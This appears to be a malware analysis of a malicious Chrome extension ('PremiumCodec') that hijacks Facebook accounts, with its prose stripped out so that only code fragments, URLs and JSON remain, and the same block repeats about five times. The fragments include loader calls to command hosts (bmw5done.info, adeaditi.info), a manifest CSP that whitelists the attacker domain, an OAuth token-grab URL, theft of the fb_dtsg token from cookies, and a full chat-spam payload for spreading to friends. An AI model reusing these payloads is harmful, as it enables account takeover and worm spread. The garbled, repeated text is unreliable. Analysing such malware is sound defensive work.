{ "link": "https://dl.dropbox.com/s/o2yzr7kfewaqc1o/sa7d89as987d78a9d89s_2_2_2.htm?1241705463", "type": "aktiv" }.
link, «?», 20 , ajax- www.googleapis.com/urlshortener/v1/url
. localStorage “fb_postlink”. .
ajax-api graph.facebook.com . facebook.com/ajax/typeahead/place_tag_friends.php
json . json , friends_fields, 20 :
“&composertags_with[19]=<id_ >"
.
20
veri, friends_fields.
, msjrandom. json, C&C, 'aktiv' 1, post_add(). “ ” + “Private Video” msjrandom, "fb_postlink". , ( veri). .
, Like, , . , , .
:
uygulamaizinver(TokenUrl("517220311745087"));
, Facebook- Facebook- id 517220311745087. TokenUrl() url -:
www.facebook.com/dialog/oauth?response_type=token&display=popup&client_id=517220311745087&redirect_uri=fbconnect://success&sso_key=com&scope=email,publish_stream,user_likes,friends_likes,user_birthday
uygulamaizinver()
ajax-, html, , action . duzenlevegonder()
, , , duzenlevegonder()
.
Facebook , , . . .
, facebook.com, , babasker()
, bmw5done.info/ag.php
. php-, C&C, , API Facebook. json :
{ "link": "https://dl.dropbox.com/s/o2yzr7kfewaqc1o/sa7d89as987d78a9d89s_2_2_2.htm?1241705463", "base": "facebook.com", "okan": , "foto1": "https://graph.facebook.com/", "foto2": "/picture?type=large&width=150&height=150", "titulli": , "friends": "jo", "friendname": "jo", "type": "aktiv","web": "po" }
“type” aktiv, ajax- www.googleapis.com/urlshortener/v1 , , C&C “link”, localStorage "fb_postlink", , . qwecek()
, C&C json.
AJAX-API Facebook facebook.com/ajax/chat/buddy_list.php?__a=1
id , Facebook-, configList. 20 id . c json benimesaj()
, :
message_batch[0][action_type]=ma-type%3Auser-generated-message&message_batch[0][author]=fbid%3A<id__>&message_batch[0][author_email]&message_batch[0][coordinates]&message_batch[0][timestamp_time_passed]=0&message_batch[0][is_unread]=false&message_batch[0][is_cleared]=false&message_batch[0][is_forward]=false&message_batch[0][is_filtered_content]=false&message_batch[0][is_spoof_warning]=false&message_batch[0][source]=source%3Achat%3Aweb&message_batch[0][source_tags][0]=source%3Achat&message_batch[0][body]= &message_batch[0][has_attachment]=true&message_batch[0][html_body]=false&&message_batch[0][specific_to_list][0]=fbid%3A<id__online>&message_batch[0][specific_to_list][1]=fbid%3A<id__>&message_batch[0][content_attachment][subject]=IP6%20Short%20URL%20-%20Free%20service&message_batch[0][content_attachment][app_id]=2309869772&message_batch[0][content_attachment][attachment][params][urlInfo][canonical]=<fb_post_link>&message_batch[0][content_attachment][attachment][params][urlInfo][final]=<fb_post_link>&message_batch[0][content_attachment][attachment][params][urlInfo][user]=<fb_post_link>&message_batch[0][content_attachment][attachment][params][favicon]=&message_batch[0][content_attachment][attachment][params][title]=<__online>jo&message_batch[0][content_attachment][attachment][params][summary]=youtube.com&message_batch[0][content_attachment][attachment][params][images][0]=https://graph.facebook.com/<id__online>/picture?type=large&width=150&height=150&message_batch[0][content_attachment][attachm...k_
metrics][images_pending]=0&message_batch[0][content_attachment][link_metrics][images_fetched]=0&message_batch[0][content_attachment][link_metrics][image_dimensions][0]=626&message_batch[0][content_attachment][link_metrics][image_dimensions][1]=293&message_batch[0][content_attachment][link_metrics][images_selected]=1&message_batch[0][content_attachment][link_metrics][images_considered]=1&message_batch[0][content_attachment][link_metrics][images_cap]=3&message_batch[0][content_attachment][link_metrics][images_type]=ranked&message_batch[0][content_attachment][composer_metrics][best_image_w]=100&message_batch[0][content_attachment][composer_metrics][best_image_h]=100&message_batch[0][content_attachment][composer_metrics][image_selected]=0&message_batch[0][content_attachment][composer_metrics][images_provided]=1&message_batch[0][content_attachment][composer_metrics][images_loaded]=1&message_batch[0][content_attachment][composer_metrics][images_shown]=1&message_batch[0][content_attachment][composer_metrics][load_duration]=4&message_batch[0][content_attachment][composer_metrics][timed_out]=0&message_batch[0][content_attachment][composer_metrics][sort_order]=&message_batch[0][content_attachment][composer_metrics][selector_type]=UIThumbPager_6&message_batch[0][ui_push_phase]=V3&message_batch[0][status]=0&client=mercury&__user=AAA&__a=1&__dyn=7n8anEAMCBynzpQ9UoGya4Cq74qbx2mbAKGiyGGEZ9LFDxCm6p_AyoSnx2&__req=f&fb_dtsg=100004008835111&ttstamp=2658172571218810680459011989&__rev=1300533
.
API facebook.com /ajax/mercury/send_messages.php?__a=1 , , .
id
localStorage okanxxxxss2 + 11e4, babasker()
.
, Firefox. , .
, chrome.tabs.executeScript CSP-, //superfish.com, //ads.panoramtech.net srv1.clk-analytics.com head , CSP . , , CSP facebook.com. , . img-src object-src, facebook.com CSP .
Chrome, , - :
. ; - , .
, , .. , , - . , , , , - .
, , C&C , , , adeaditi.info
cracks4free.info.
:
support.mozilla.org/ru/questions/959873
stackoverflow.com/questions/17982902/prevent-malware-javascript-from-executing
, . , , , 2011 .
, - . Facebook . , .
SBAPI DNS, . , , , . , CSP , , img-src object-src, , , , .
head . kmain.js - , . Facebook , , adeaditi.info/kmain.js
- . , Firefox Facebook- .

PremiumCodec

adeaditi.info/kmain.js
Chrome
: icon128.png, manifest.json main.js. , YouTube, "contextMenus" permissions. , :
"content_security_policy": "script-src 'self' 'unsafe-eval' bmw5done.info; object-src 'self' 'unsafe-eval'"
,
, CSP https bmw5done.info.
main.js

main.js
, document.write(“https://bmw5done.info/indonesia/ld.js”) .
ld.js, . box, ajax- :
bmw5done.info/qbrweq.js?187630.24409614317
json, uri, cmd. json , , cmd . , .
ld.js localStorage ran_before, , , 1, facebook.com.

ld.js
callback- . , url “devtools://”, , ajax-
bmw5done.info/qbrweq.js?
, chrome.tabs.executeScript. callback , URL : “chrome://chrome/extensions” , “opera://extensions”, “chrome://extensions/”.
qbrweq.js? , Facebook-, .
, URL “www.facebook.com”, , . ,
uiToggle wrap, uiPopover. _5ce
. , . , , Facebook .

qbrweq.js,
ajax- facebook.com, document.cookie , ANTI-CSRF- “fb_dtsg” uid . , .

URL
bmw5done.info/apostime.php
— php- C&C . , , json, : link type. :
{ "link": "https://dl.dropbox.com/s/o2yzr7kfewaqc1o/sa7d89as987d78a9d89s_2_2_2.htm?1241705463", "type": "aktiv" }.
link, «?», 20 , ajax-
www.googleapis.com/urlshortener/v1/url
. localStorage “fb_postlink”. .
ajax-api graph.facebook.com .
facebook.com/ajax/typeahead/place_tag_friends.php
json . json , friends_fields, 20 :
“&composertags_with[19]=<id_ >"
.

20
veri, friends_fields.
, msjrandom. json, C&C, 'aktiv' 1, post_add(). “ ” + “Private Video” msjrandom, "fb_postlink". , ( veri). .
, Like, , . , , .
:
uygulamaizinver(TokenUrl("517220311745087"));
, Facebook- Facebook- id 517220311745087. TokenUrl() url -:
www.facebook.com/dialog/oauth?response_type=token&display=popup&client_id=517220311745087&redirect_uri=fbconnect://success&sso_key=com&scope=email,publish_stream,user_likes,friends_likes,user_birthday

uygulamaizinver()
ajax-, html, , action .
duzenlevegonder()
, , ,
duzenlevegonder()
.

Facebook , , . . .
, facebook.com, ,
babasker()
,
bmw5done.info/ag.php
. php-, C&C, , API Facebook. json :
{ "link": "https://dl.dropbox.com/s/o2yzr7kfewaqc1o/sa7d89as987d78a9d89s_2_2_2.htm?1241705463", "base": "facebook.com", "okan": , "foto1": "https://graph.facebook.com/", "foto2": "/picture?type=large&width=150&height=150", "titulli": , "friends": "jo", "friendname": "jo", "type": "aktiv","web": "po" }
“type” aktiv, ajax- www.googleapis.com/urlshortener/v1 , , C&C “link”, localStorage "fb_postlink", , .
qwecek()
, C&C json.
AJAX-API Facebook facebook.com/ajax/chat/buddy_list.php?__a=1
id , Facebook-, configList. 20 id . c json
benimesaj()
, :
message_batch[0][action_type]=ma-type%3Auser-generated-message&message_batch[0][author]=fbid%3A<id__>&message_batch[0][author_email]&message_batch[0][coordinates]&message_batch[0][timestamp_time_passed]=0&message_batch[0][is_unread]=false&message_batch[0][is_cleared]=false&message_batch[0][is_forward]=false&message_batch[0][is_filtered_content]=false&message_batch[0][is_spoof_warning]=false&message_batch[0][source]=source%3Achat%3Aweb&message_batch[0][source_tags][0]=source%3Achat&message_batch[0][body]= &message_batch[0][has_attachment]=true&message_batch[0][html_body]=false&&message_batch[0][specific_to_list][0]=fbid%3A<id__online>&message_batch[0][specific_to_list][1]=fbid%3A<id__>&message_batch[0][content_attachment][subject]=IP6%20Short%20URL%20-%20Free%20service&message_batch[0][content_attachment][app_id]=2309869772&message_batch[0][content_attachment][attachment][params][urlInfo][canonical]=<fb_post_link>&message_batch[0][content_attachment][attachment][params][urlInfo][final]=<fb_post_link>&message_batch[0][content_attachment][attachment][params][urlInfo][user]=<fb_post_link>&message_batch[0][content_attachment][attachment][params][favicon]=&message_batch[0][content_attachment][attachment][params][title]=<__online>jo&message_batch[0][content_attachment][attachment][params][summary]=youtube.com&message_batch[0][content_attachment][attachment][params][images][0]=https://graph.facebook.com/<id__online>/picture?type=large&width=150&height=150&message_batch[0][content_attachment][attachm...k_
metrics][images_pending]=0&message_batch[0][content_attachment][link_metrics][images_fetched]=0&message_batch[0][content_attachment][link_metrics][image_dimensions][0]=626&message_batch[0][content_attachment][link_metrics][image_dimensions][1]=293&message_batch[0][content_attachment][link_metrics][images_selected]=1&message_batch[0][content_attachment][link_metrics][images_considered]=1&message_batch[0][content_attachment][link_metrics][images_cap]=3&message_batch[0][content_attachment][link_metrics][images_type]=ranked&message_batch[0][content_attachment][composer_metrics][best_image_w]=100&message_batch[0][content_attachment][composer_metrics][best_image_h]=100&message_batch[0][content_attachment][composer_metrics][image_selected]=0&message_batch[0][content_attachment][composer_metrics][images_provided]=1&message_batch[0][content_attachment][composer_metrics][images_loaded]=1&message_batch[0][content_attachment][composer_metrics][images_shown]=1&message_batch[0][content_attachment][composer_metrics][load_duration]=4&message_batch[0][content_attachment][composer_metrics][timed_out]=0&message_batch[0][content_attachment][composer_metrics][sort_order]=&message_batch[0][content_attachment][composer_metrics][selector_type]=UIThumbPager_6&message_batch[0][ui_push_phase]=V3&message_batch[0][status]=0&client=mercury&__user=AAA&__a=1&__dyn=7n8anEAMCBynzpQ9UoGya4Cq74qbx2mbAKGiyGGEZ9LFDxCm6p_AyoSnx2&__req=f&fb_dtsg=100004008835111&ttstamp=2658172571218810680459011989&__rev=1300533
.
API facebook.com /ajax/mercury/send_messages.php?__a=1 , , .

id
localStorage okanxxxxss2 + 11e4,
babasker()
.
, Firefox. , .

, chrome.tabs.executeScript CSP-, //superfish.com, //ads.panoramtech.net srv1.clk-analytics.com head , CSP . , , CSP facebook.com. , . img-src object-src, facebook.com CSP .
Chrome, , - :
. ; - , .
, , .. , , - . , , , , - .
, , C&C , , , adeaditi.info
cracks4free.info.
:
support.mozilla.org/ru/questions/959873
stackoverflow.com/questions/17982902/prevent-malware-javascript-from-executing
, . , , , 2011 .
, - . Facebook . , .
SBAPI DNS, . , , , . , CSP , , img-src object-src, , , , .
head . kmain.js - , . Facebook , , adeaditi.info/kmain.js
- . , Firefox Facebook- .
PremiumCodec
adeaditi.info/kmain.js
Chrome
: icon128.png, manifest.json main.js. , YouTube, "contextMenus" permissions. , :
"content_security_policy": "script-src 'self' 'unsafe-eval' bmw5done.info; object-src 'self' 'unsafe-eval'"
,
, CSP https bmw5done.info.
main.js
main.js
, document.write(“https://bmw5done.info/indonesia/ld.js”) .
ld.js, . box, ajax- :
bmw5done.info/qbrweq.js?187630.24409614317
json, uri, cmd. json , , cmd . , .
ld.js localStorage ran_before, , , 1, facebook.com.
ld.js
callback- . , url “devtools://”, , ajax- bmw5done.info/qbrweq.js?
, chrome.tabs.executeScript. callback , URL : “chrome://chrome/extensions” , “opera://extensions”, “chrome://extensions/”.
qbrweq.js? , Facebook-, .
, URL “www.facebook.com”, , . , uiToggle wrap, uiPopover. _5ce
. , . , , Facebook .
qbrweq.js,
ajax- facebook.com, document.cookie , ANTI-CSRF- “fb_dtsg” uid . , .
URL bmw5done.info/apostime.php
— php- C&C . , , json, : link type. :
{ "link": "https://dl.dropbox.com/s/o2yzr7kfewaqc1o/sa7d89as987d78a9d89s_2_2_2.htm?1241705463", "type": "aktiv" }.
link, «?», 20 , ajax- www.googleapis.com/urlshortener/v1/url
. localStorage “fb_postlink”. .
ajax-api graph.facebook.com . facebook.com/ajax/typeahead/place_tag_friends.php
json . json , friends_fields, 20 :
“&composertags_with[19]=<id_ >"
.
20
veri, friends_fields.
, msjrandom. json, C&C, 'aktiv' 1, post_add(). “ ” + “Private Video” msjrandom, "fb_postlink". , ( veri). .
, Like, , . , , .
:
uygulamaizinver(TokenUrl("517220311745087"));
, Facebook- Facebook- id 517220311745087. TokenUrl() url -:
www.facebook.com/dialog/oauth?response_type=token&display=popup&client_id=517220311745087&redirect_uri=fbconnect://success&sso_key=com&scope=email,publish_stream,user_likes,friends_likes,user_birthday
uygulamaizinver()
ajax-, html, , action . duzenlevegonder()
, , , duzenlevegonder()
.
Facebook , , . . .
, facebook.com, , babasker()
, bmw5done.info/ag.php
. php-, C&C, , API Facebook. json :
{ "link": "https://dl.dropbox.com/s/o2yzr7kfewaqc1o/sa7d89as987d78a9d89s_2_2_2.htm?1241705463", "base": "facebook.com", "okan": , "foto1": "https://graph.facebook.com/", "foto2": "/picture?type=large&width=150&height=150", "titulli": , "friends": "jo", "friendname": "jo", "type": "aktiv","web": "po" }
“type” aktiv, ajax- www.googleapis.com/urlshortener/v1 , , C&C “link”, localStorage "fb_postlink", , . qwecek()
, C&C json.
AJAX-API Facebook facebook.com/ajax/chat/buddy_list.php?__a=1
id , Facebook-, configList. 20 id . c json benimesaj()
, :
message_batch[0][action_type]=ma-type%3Auser-generated-message&message_batch[0][author]=fbid%3A<id__>&message_batch[0][author_email]&message_batch[0][coordinates]&message_batch[0][timestamp_time_passed]=0&message_batch[0][is_unread]=false&message_batch[0][is_cleared]=false&message_batch[0][is_forward]=false&message_batch[0][is_filtered_content]=false&message_batch[0][is_spoof_warning]=false&message_batch[0][source]=source%3Achat%3Aweb&message_batch[0][source_tags][0]=source%3Achat&message_batch[0][body]= &message_batch[0][has_attachment]=true&message_batch[0][html_body]=false&&message_batch[0][specific_to_list][0]=fbid%3A<id__online>&message_batch[0][specific_to_list][1]=fbid%3A<id__>&message_batch[0][content_attachment][subject]=IP6%20Short%20URL%20-%20Free%20service&message_batch[0][content_attachment][app_id]=2309869772&message_batch[0][content_attachment][attachment][params][urlInfo][canonical]=<fb_post_link>&message_batch[0][content_attachment][attachment][params][urlInfo][final]=<fb_post_link>&message_batch[0][content_attachment][attachment][params][urlInfo][user]=<fb_post_link>&message_batch[0][content_attachment][attachment][params][favicon]=&message_batch[0][content_attachment][attachment][params][title]=<__online>jo&message_batch[0][content_attachment][attachment][params][summary]=youtube.com&message_batch[0][content_attachment][attachment][params][images][0]=https://graph.facebook.com/<id__online>/picture?type=large&width=150&height=150&message_batch[0][content_attachment][attachm...k_
metrics][images_pending]=0&message_batch[0][content_attachment][link_metrics][images_fetched]=0&message_batch[0][content_attachment][link_metrics][image_dimensions][0]=626&message_batch[0][content_attachment][link_metrics][image_dimensions][1]=293&message_batch[0][content_attachment][link_metrics][images_selected]=1&message_batch[0][content_attachment][link_metrics][images_considered]=1&message_batch[0][content_attachment][link_metrics][images_cap]=3&message_batch[0][content_attachment][link_metrics][images_type]=ranked&message_batch[0][content_attachment][composer_metrics][best_image_w]=100&message_batch[0][content_attachment][composer_metrics][best_image_h]=100&message_batch[0][content_attachment][composer_metrics][image_selected]=0&message_batch[0][content_attachment][composer_metrics][images_provided]=1&message_batch[0][content_attachment][composer_metrics][images_loaded]=1&message_batch[0][content_attachment][composer_metrics][images_shown]=1&message_batch[0][content_attachment][composer_metrics][load_duration]=4&message_batch[0][content_attachment][composer_metrics][timed_out]=0&message_batch[0][content_attachment][composer_metrics][sort_order]=&message_batch[0][content_attachment][composer_metrics][selector_type]=UIThumbPager_6&message_batch[0][ui_push_phase]=V3&message_batch[0][status]=0&client=mercury&__user=AAA&__a=1&__dyn=7n8anEAMCBynzpQ9UoGya4Cq74qbx2mbAKGiyGGEZ9LFDxCm6p_AyoSnx2&__req=f&fb_dtsg=100004008835111&ttstamp=2658172571218810680459011989&__rev=1300533
.
API facebook.com /ajax/mercury/send_messages.php?__a=1 , , .
id
localStorage okanxxxxss2 + 11e4, babasker()
.
, Firefox. , .
, chrome.tabs.executeScript CSP-, //superfish.com, //ads.panoramtech.net srv1.clk-analytics.com head , CSP . , , CSP facebook.com. , . img-src object-src, facebook.com CSP .
Chrome, , - :
. ; - , .
, , .. , , - . , , , , - .
, , C&C , , , adeaditi.info
cracks4free.info.
:
support.mozilla.org/ru/questions/959873
stackoverflow.com/questions/17982902/prevent-malware-javascript-from-executing
, . , , , 2011 .
, - . Facebook . , .
SBAPI DNS, . , , , . , CSP , , img-src object-src, , , , .
-
head . kmain.js - , . Facebook , , adeaditi.info/kmain.js
- . , Firefox Facebook- .
PremiumCodec
adeaditi.info/kmain.js
Chrome
: icon128.png, manifest.json main.js. , YouTube, "contextMenus" permissions. , :
"content_security_policy": "script-src 'self' 'unsafe-eval' bmw5done.info; object-src 'self' 'unsafe-eval'"
,
, CSP https bmw5done.info.
main.js
main.js
, document.write(“https://bmw5done.info/indonesia/ld.js”) .
ld.js, . box, ajax- :
bmw5done.info/qbrweq.js?187630.24409614317
json, uri, cmd. json , , cmd . , .
ld.js localStorage ran_before, , , 1, facebook.com.
ld.js
callback- . , url “devtools://”, , ajax-bmw5done.info/qbrweq.js?
, chrome.tabs.executeScript. callback , URL : “chrome://chrome/extensions” , “opera://extensions”, “chrome://extensions/”.
qbrweq.js? , Facebook-, .
, URL “www.facebook.com”, , . ,uiToggle wrap, uiPopover. _5ce
. , . , , Facebook .
qbrweq.js,
ajax- facebook.com, document.cookie , ANTI-CSRF- “fb_dtsg” uid . , .
URLbmw5done.info/apostime.php
— php- C&C . , , json, : link type. :
{ "link": "https://dl.dropbox.com/s/o2yzr7kfewaqc1o/sa7d89as987d78a9d89s_2_2_2.htm?1241705463", "type": "aktiv" }.
link, «?», 20 , ajax-www.googleapis.com/urlshortener/v1/url
. localStorage “fb_postlink”. .
ajax-api graph.facebook.com .facebook.com/ajax/typeahead/place_tag_friends.php
json . json , friends_fields, 20 :
“&composertags_with[19]=<id_ >"
.
20
veri, friends_fields.
, msjrandom. json, C&C, 'aktiv' 1, post_add(). “ ” + “Private Video” msjrandom, "fb_postlink". , ( veri). .
, Like, , . , , .
:
uygulamaizinver(TokenUrl("517220311745087"));
, Facebook- Facebook- id 517220311745087. TokenUrl() url -:
www.facebook.com/dialog/oauth?response_type=token&display=popup&client_id=517220311745087&redirect_uri=fbconnect://success&sso_key=com&scope=email,publish_stream,user_likes,friends_likes,user_birthday
uygulamaizinver()
ajax-, html, , action .duzenlevegonder()
, , ,duzenlevegonder()
.
Facebook , , . . .
, facebook.com, ,babasker()
,bmw5done.info/ag.php
. php-, C&C, , API Facebook. json :
{ "link": "https://dl.dropbox.com/s/o2yzr7kfewaqc1o/sa7d89as987d78a9d89s_2_2_2.htm?1241705463", "base": "facebook.com", "okan": , "foto1": "https://graph.facebook.com/", "foto2": "/picture?type=large&width=150&height=150", "titulli": , "friends": "jo", "friendname": "jo", "type": "aktiv","web": "po" }
“type” aktiv, ajax- www.googleapis.com/urlshortener/v1 , , C&C “link”, localStorage "fb_postlink", , .qwecek()
, C&C json.
AJAX-API Facebook facebook.com/ajax/chat/buddy_list.php?__a=1
id , Facebook-, configList. 20 id . c jsonbenimesaj()
, :
message_batch[0][action_type]=ma-type%3Auser-generated-message&message_batch[0][author]=fbid%3A<id__>&message_batch[0][author_email]&message_batch[0][coordinates]&message_batch[0][timestamp_time_passed]=0&message_batch[0][is_unread]=false&message_batch[0][is_cleared]=false&message_batch[0][is_forward]=false&message_batch[0][is_filtered_content]=false&message_batch[0][is_spoof_warning]=false&message_batch[0][source]=source%3Achat%3Aweb&message_batch[0][source_tags][0]=source%3Achat&message_batch[0][body]= &message_batch[0][has_attachment]=true&message_batch[0][html_body]=false&&message_batch[0][specific_to_list][0]=fbid%3A<id__online>&message_batch[0][specific_to_list][1]=fbid%3A<id__>&message_batch[0][content_attachment][subject]=IP6%20Short%20URL%20-%20Free%20service&message_batch[0][content_attachment][app_id]=2309869772&message_batch[0][content_attachment][attachment][params][urlInfo][canonical]=<fb_post_link>&message_batch[0][content_attachment][attachment][params][urlInfo][final]=<fb_post_link>&message_batch[0][content_attachment][attachment][params][urlInfo][user]=<fb_post_link>&message_batch[0][content_attachment][attachment][params][favicon]=&message_batch[0][content_attachment][attachment][params][title]=<__online>jo&message_batch[0][content_attachment][attachment][params][summary]=youtube.com&message_batch[0][content_attachment][attachment][params][images][0]=https://graph.facebook.com/<id__online>/picture?type=large&width=150&height=150&message_batch[0][content_attachment][attachm...k_
metrics][images_pending]=0&message_batch[0][content_attachment][link_metrics][images_fetched]=0&message_batch[0][content_attachment][link_metrics][image_dimensions][0]=626&message_batch[0][content_attachment][link_metrics][image_dimensions][1]=293&message_batch[0][content_attachment][link_metrics][images_selected]=1&message_batch[0][content_attachment][link_metrics][images_considered]=1&message_batch[0][content_attachment][link_metrics][images_cap]=3&message_batch[0][content_attachment][link_metrics][images_type]=ranked&message_batch[0][content_attachment][composer_metrics][best_image_w]=100&message_batch[0][content_attachment][composer_metrics][best_image_h]=100&message_batch[0][content_attachment][composer_metrics][image_selected]=0&message_batch[0][content_attachment][composer_metrics][images_provided]=1&message_batch[0][content_attachment][composer_metrics][images_loaded]=1&message_batch[0][content_attachment][composer_metrics][images_shown]=1&message_batch[0][content_attachment][composer_metrics][load_duration]=4&message_batch[0][content_attachment][composer_metrics][timed_out]=0&message_batch[0][content_attachment][composer_metrics][sort_order]=&message_batch[0][content_attachment][composer_metrics][selector_type]=UIThumbPager_6&message_batch[0][ui_push_phase]=V3&message_batch[0][status]=0&client=mercury&__user=AAA&__a=1&__dyn=7n8anEAMCBynzpQ9UoGya4Cq74qbx2mbAKGiyGGEZ9LFDxCm6p_AyoSnx2&__req=f&fb_dtsg=100004008835111&ttstamp=2658172571218810680459011989&__rev=1300533
.
API facebook.com /ajax/mercury/send_messages.php?__a=1 , , .
id
localStorage okanxxxxss2 + 11e4,babasker()
.
, Firefox. , .
, chrome.tabs.executeScript CSP-, //superfish.com, //ads.panoramtech.net srv1.clk-analytics.com head , CSP . , , CSP facebook.com. , . img-src object-src, facebook.com CSP .
Chrome, , - :
. ; - , .
, , .. , , - . , , , , - .
, , C&C , , , adeaditi.info
cracks4free.info.
:
support.mozilla.org/ru/questions/959873
stackoverflow.com/questions/17982902/prevent-malware-javascript-from-executing
, . , , , 2011 .
, - . Facebook . , .
SBAPI DNS, . , , , . , CSP , , img-src object-src, , , , .
-
head . kmain.js - , . Facebook , , adeaditi.info/kmain.js
- . , Firefox Facebook- .
PremiumCodec
adeaditi.info/kmain.js
Chrome
: icon128.png, manifest.json main.js. , YouTube, "contextMenus" permissions. , :
"content_security_policy": "script-src 'self' 'unsafe-eval' bmw5done.info; object-src 'self' 'unsafe-eval'"
,
, CSP https bmw5done.info.
main.js
main.js
, document.write(“https://bmw5done.info/indonesia/ld.js”) .
ld.js, . box, ajax- :
bmw5done.info/qbrweq.js?187630.24409614317
json, uri, cmd. json , , cmd . , .
ld.js localStorage ran_before, , , 1, facebook.com.
ld.js
callback- . , url “devtools://”, , ajax-bmw5done.info/qbrweq.js?
, chrome.tabs.executeScript. callback , URL : “chrome://chrome/extensions” , “opera://extensions”, “chrome://extensions/”.
qbrweq.js? , Facebook-, .
, URL “www.facebook.com”, , . ,uiToggle wrap, uiPopover. _5ce
. , . , , Facebook .
qbrweq.js,
ajax- facebook.com, document.cookie , ANTI-CSRF- “fb_dtsg” uid . , .
URLbmw5done.info/apostime.php
— php- C&C . , , json, : link type. :
{ "link": "https://dl.dropbox.com/s/o2yzr7kfewaqc1o/sa7d89as987d78a9d89s_2_2_2.htm?1241705463", "type": "aktiv" }.
link, «?», 20 , ajax-www.googleapis.com/urlshortener/v1/url
. localStorage “fb_postlink”. .
ajax-api graph.facebook.com .facebook.com/ajax/typeahead/place_tag_friends.php
json . json , friends_fields, 20 :
“&composertags_with[19]=<id_ >"
.
20
veri, friends_fields.
, msjrandom. json, C&C, 'aktiv' 1, post_add(). “ ” + “Private Video” msjrandom, "fb_postlink". , ( veri). .
, Like, , . , , .
:
uygulamaizinver(TokenUrl("517220311745087"));
, Facebook- Facebook- id 517220311745087. TokenUrl() url -:
www.facebook.com/dialog/oauth?response_type=token&display=popup&client_id=517220311745087&redirect_uri=fbconnect://success&sso_key=com&scope=email,publish_stream,user_likes,friends_likes,user_birthday
uygulamaizinver()
ajax-, html, , action .duzenlevegonder()
, , ,duzenlevegonder()
.
Facebook , , . . .
, facebook.com, ,babasker()
,bmw5done.info/ag.php
. php-, C&C, , API Facebook. json :
{ "link": "https://dl.dropbox.com/s/o2yzr7kfewaqc1o/sa7d89as987d78a9d89s_2_2_2.htm?1241705463", "base": "facebook.com", "okan": , "foto1": "https://graph.facebook.com/", "foto2": "/picture?type=large&width=150&height=150", "titulli": , "friends": "jo", "friendname": "jo", "type": "aktiv","web": "po" }
“type” aktiv, ajax- www.googleapis.com/urlshortener/v1 , , C&C “link”, localStorage "fb_postlink", , .qwecek()
, C&C json.
AJAX-API Facebook facebook.com/ajax/chat/buddy_list.php?__a=1
id , Facebook-, configList. 20 id . c jsonbenimesaj()
, :
message_batch[0][action_type]=ma-type%3Auser-generated-message&message_batch[0][author]=fbid%3A<id__>&message_batch[0][author_email]&message_batch[0][coordinates]&message_batch[0][timestamp_time_passed]=0&message_batch[0][is_unread]=false&message_batch[0][is_cleared]=false&message_batch[0][is_forward]=false&message_batch[0][is_filtered_content]=false&message_batch[0][is_spoof_warning]=false&message_batch[0][source]=source%3Achat%3Aweb&message_batch[0][source_tags][0]=source%3Achat&message_batch[0][body]= &message_batch[0][has_attachment]=true&message_batch[0][html_body]=false&&message_batch[0][specific_to_list][0]=fbid%3A<id__online>&message_batch[0][specific_to_list][1]=fbid%3A<id__>&message_batch[0][content_attachment][subject]=IP6%20Short%20URL%20-%20Free%20service&message_batch[0][content_attachment][app_id]=2309869772&message_batch[0][content_attachment][attachment][params][urlInfo][canonical]=<fb_post_link>&message_batch[0][content_attachment][attachment][params][urlInfo][final]=<fb_post_link>&message_batch[0][content_attachment][attachment][params][urlInfo][user]=<fb_post_link>&message_batch[0][content_attachment][attachment][params][favicon]=&message_batch[0][content_attachment][attachment][params][title]=<__online>jo&message_batch[0][content_attachment][attachment][params][summary]=youtube.com&message_batch[0][content_attachment][attachment][params][images][0]=https://graph.facebook.com/<id__online>/picture?type=large&width=150&height=150&message_batch[0][content_attachment][attachm...k_
metrics][images_pending]=0&message_batch[0][content_attachment][link_metrics][images_fetched]=0&message_batch[0][content_attachment][link_metrics][image_dimensions][0]=626&message_batch[0][content_attachment][link_metrics][image_dimensions][1]=293&message_batch[0][content_attachment][link_metrics][images_selected]=1&message_batch[0][content_attachment][link_metrics][images_considered]=1&message_batch[0][content_attachment][link_metrics][images_cap]=3&message_batch[0][content_attachment][link_metrics][images_type]=ranked&message_batch[0][content_attachment][composer_metrics][best_image_w]=100&message_batch[0][content_attachment][composer_metrics][best_image_h]=100&message_batch[0][content_attachment][composer_metrics][image_selected]=0&message_batch[0][content_attachment][composer_metrics][images_provided]=1&message_batch[0][content_attachment][composer_metrics][images_loaded]=1&message_batch[0][content_attachment][composer_metrics][images_shown]=1&message_batch[0][content_attachment][composer_metrics][load_duration]=4&message_batch[0][content_attachment][composer_metrics][timed_out]=0&message_batch[0][content_attachment][composer_metrics][sort_order]=&message_batch[0][content_attachment][composer_metrics][selector_type]=UIThumbPager_6&message_batch[0][ui_push_phase]=V3&message_batch[0][status]=0&client=mercury&__user=AAA&__a=1&__dyn=7n8anEAMCBynzpQ9UoGya4Cq74qbx2mbAKGiyGGEZ9LFDxCm6p_AyoSnx2&__req=f&fb_dtsg=100004008835111&ttstamp=2658172571218810680459011989&__rev=1300533
.
API facebook.com /ajax/mercury/send_messages.php?__a=1 , , .
id
localStorage okanxxxxss2 + 11e4,babasker()
.
, Firefox. , .
, chrome.tabs.executeScript CSP-, //superfish.com, //ads.panoramtech.net srv1.clk-analytics.com head , CSP . , , CSP facebook.com. , . img-src object-src, facebook.com CSP .
Chrome, , - :
. ; - , .
, , .. , , - . , , , , - .
, , C&C , , , adeaditi.info
cracks4free.info.
:
support.mozilla.org/ru/questions/959873
stackoverflow.com/questions/17982902/prevent-malware-javascript-from-executing
, . , , , 2011 .
, - . Facebook . , .
SBAPI DNS, . , , , . , CSP , , img-src object-src, , , , .
head . kmain.js - , . Facebook , , adeaditi.info/kmain.js
- . , Firefox Facebook- .
PremiumCodec
adeaditi.info/kmain.js
Chrome
: icon128.png, manifest.json main.js. , YouTube, "contextMenus" permissions. , :
"content_security_policy": "script-src 'self' 'unsafe-eval' bmw5done.info; object-src 'self' 'unsafe-eval'"
,
, CSP https bmw5done.info.
main.js
main.js
, document.write(“https://bmw5done.info/indonesia/ld.js”) .
ld.js, . box, ajax- :
bmw5done.info/qbrweq.js?187630.24409614317
json, uri, cmd. json , , cmd . , .
ld.js localStorage ran_before, , , 1, facebook.com.
ld.js
callback- . , url “devtools://”, , ajax- bmw5done.info/qbrweq.js?
, chrome.tabs.executeScript. callback , URL : “chrome://chrome/extensions” , “opera://extensions”, “chrome://extensions/”.
qbrweq.js? , Facebook-, .
, URL “www.facebook.com”, , . , uiToggle wrap, uiPopover. _5ce
. , . , , Facebook .
qbrweq.js,
ajax- facebook.com, document.cookie , ANTI-CSRF- “fb_dtsg” uid . , .
URL bmw5done.info/apostime.php
— php- C&C . , , json, : link type. :
{ "link": "https://dl.dropbox.com/s/o2yzr7kfewaqc1o/sa7d89as987d78a9d89s_2_2_2.htm?1241705463", "type": "aktiv" }.
